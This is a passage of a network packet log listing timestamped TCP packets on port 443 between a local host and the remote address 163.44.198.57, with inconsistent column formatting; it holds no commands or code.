                                Dec 10, 2024 14:21:41.986872911 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:41.986933947 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:41.986958981 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:41.986974001 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:41.987001896 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:42.216248989 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:42.216260910 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:42.216308117 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:42.216332912 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:42.216345072 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:42.216393948 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:42.261013031 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:42.261032104 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:42.261113882 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:42.261122942 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:42.261167049 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:42.494785070 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:42.494797945 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:42.494843006 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:42.494860888 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:42.494934082 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:42.494941950 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:42.494985104 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:42.502290010 CET | 49701 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:42.547338963 CET | 443 | 49701 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:42.726574898 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:42.726589918 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:42.726628065 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:42.726690054 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:42.726717949 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:42.726732969 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:42.726758957 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:42.765765905 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:42.765790939 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:42.765831947 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:42.765873909 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:42.765888929 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:42.765909910 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:42.991844893 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:42.991859913 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:42.991875887 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:42.991931915 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:42.991955996 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:42.991974115 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:42.991991997 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:43.022731066 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:43.022752047 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:43.022845984 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:43.022866964 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:43.022908926 CET | 49700 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:43.070786953 CET | 443 | 49701 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:43.119493961 CET | 49701 | 443 | 192.168.2.7 | 163.44.198.57
                                Dec 10, 2024 14:21:43.246309042 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:43.246325016 CET | 443 | 49700 | 163.44.198.57 | 192.168.2.7
                                Dec 10, 2024 14:21:43.246362925 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.246488094 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:43.246510983 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.246537924 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:43.246562004 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:43.279546022 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.279573917 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.279687881 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:43.279700994 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.279748917 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:43.329298973 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.329310894 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.329324961 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.329332113 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.329349041 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.329437971 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:43.329461098 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.329488993 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:43.329552889 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:43.502722979 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.502736092 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.502768993 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.502820015 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:43.502835035 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.502866030 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:43.502876043 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:43.533823013 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.533838987 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.533920050 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:43.533930063 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.533962965 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:43.581279039 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.581294060 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.581338882 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.581430912 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:43.581456900 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.581485033 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:43.581521988 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:43.749754906 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.749768972 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.749789000 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.749919891 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:43.749937057 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.753937960 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:43.775563955 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.775593996 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.775774956 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:43.775783062 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.775950909 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:43.806056976 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.806077957 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.806299925 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:43.806308985 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.806399107 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:43.835776091 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.835791111 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.835832119 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.835993052 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:43.835993052 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:43.836009979 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:43.836174011 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.017755985 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.017770052 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.017805099 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.017919064 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.017941952 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.017973900 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.017983913 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.040951014 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.040968895 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.041084051 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.041093111 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.041466951 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.091389894 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.091403008 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.091433048 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.091479063 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.091495037 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.091521025 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.091574907 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.136646032 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.136670113 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.136749029 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.136760950 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.136842966 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.253082991 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.253098011 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.253124952 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.253182888 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.253210068 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.253232956 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.253252029 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.275404930 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.275430918 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.275536060 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.275558949 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.275856018 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.299182892 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.299210072 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.299362898 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.299380064 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.299604893 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.374242067 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.374258041 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.374305010 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.374377012 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.374397993 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.374423981 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.374450922 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.508992910 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.509007931 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.509035110 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.509167910 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.509186983 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.509259939 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.529304981 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.529326916 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.529400110 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.529418945 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.529494047 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.551492929 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.551511049 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.551604033 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.551610947 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.551668882 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.571003914 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.571038008 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.571139097 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.571145058 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.571232080 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.620663881 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.620678902 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.620718956 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.620795012 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.620832920 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.620872974 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.620872974 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.776926041 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.776938915 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.776971102 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.776990891 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.777004957 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.777031898 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.777043104 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.797445059 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.797473907 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.797518015 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.797533989 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.797565937 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.797583103 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.817825079 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.817850113 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.817898035 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.817912102 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.817925930 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.817953110 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.856528997 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.856544018 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.856570005 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.856652975 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.856683969 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.856734037 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.856734037 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.898500919 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.898518085 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.898705006 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:44.898727894 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:44.898850918 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.020474911 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.020498991 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.020540953 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.020562887 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.020571947 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.020605087 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.037348032 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.037373066 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.037416935 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.037461996 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.037482023 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.037537098 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.053210020 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.053234100 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.053278923 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.053308964 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.053318024 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.053364992 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.071599007 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.071624041 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.071672916 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.071679115 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.071693897 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.071729898 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.089884996 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.089903116 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.089972973 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.089986086 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.090032101 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.122680902 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.122694969 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.122730970 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.122819901 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.122819901 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.122844934 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.122886896 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.167586088 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.167609930 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.167792082 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.167829037 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.167911053 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.286231995 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.286264896 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.286421061 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.286443949 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.286529064 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.302223921 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.302252054 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.302347898 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.302365065 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.302417994 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.318521976 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.318547010 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.318641901 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.318656921 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.318705082 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.332412004 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.332442999 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.332505941 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.332521915 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.332545996 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.332575083 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.346350908 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.346416950 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.346434116 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.346435070 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.346471071 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.346503019 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.346885920 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.346904039 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.346918106 CET49700443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.346924067 CET44349700163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.397587061 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.397602081 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.397635937 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.397676945 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.397701025 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.397736073 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.397742987 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.628489971 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.628504992 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.628541946 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.628573895 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.628596067 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.628634930 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.628648996 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.661845922 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.661870003 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.661964893 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.661998987 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.662050962 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.890603065 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.890618086 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.890644073 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.890680075 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.890702009 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.890727997 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.890742064 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.921433926 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.921458960 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.921516895 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:45.921546936 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:45.921585083 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:46.144452095 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:46.144460917 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:46.144500971 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:46.144536018 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:46.144560099 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:46.144581079 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:46.144617081 CET49701443192.168.2.7163.44.198.57
                                Dec 10, 2024 14:21:46.178047895 CET44349701163.44.198.57192.168.2.7
                                Dec 10, 2024 14:21:46.178065062 CET44349701163.44.198.57192.168.2.7
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Dec 10, 2024 14:21:46.178123951 CET  49701        443        192.168.2.7      163.44.198.57
Dec 10, 2024 14:21:46.178144932 CET  443          49701      163.44.198.57    192.168.2.7
Dec 10, 2024 14:21:46.178200006 CET  49701        443        192.168.2.7      163.44.198.57
Dec 10, 2024 14:21:46.393002987 CET  443          49701      163.44.198.57    192.168.2.7
Dec 10, 2024 14:21:46.393018961 CET  443          49701      163.44.198.57    192.168.2.7
Dec 10, 2024 14:21:46.393057108 CET  443          49701      163.44.198.57    192.168.2.7
Dec 10, 2024 14:21:46.393105984 CET  49701        443        192.168.2.7      163.44.198.57
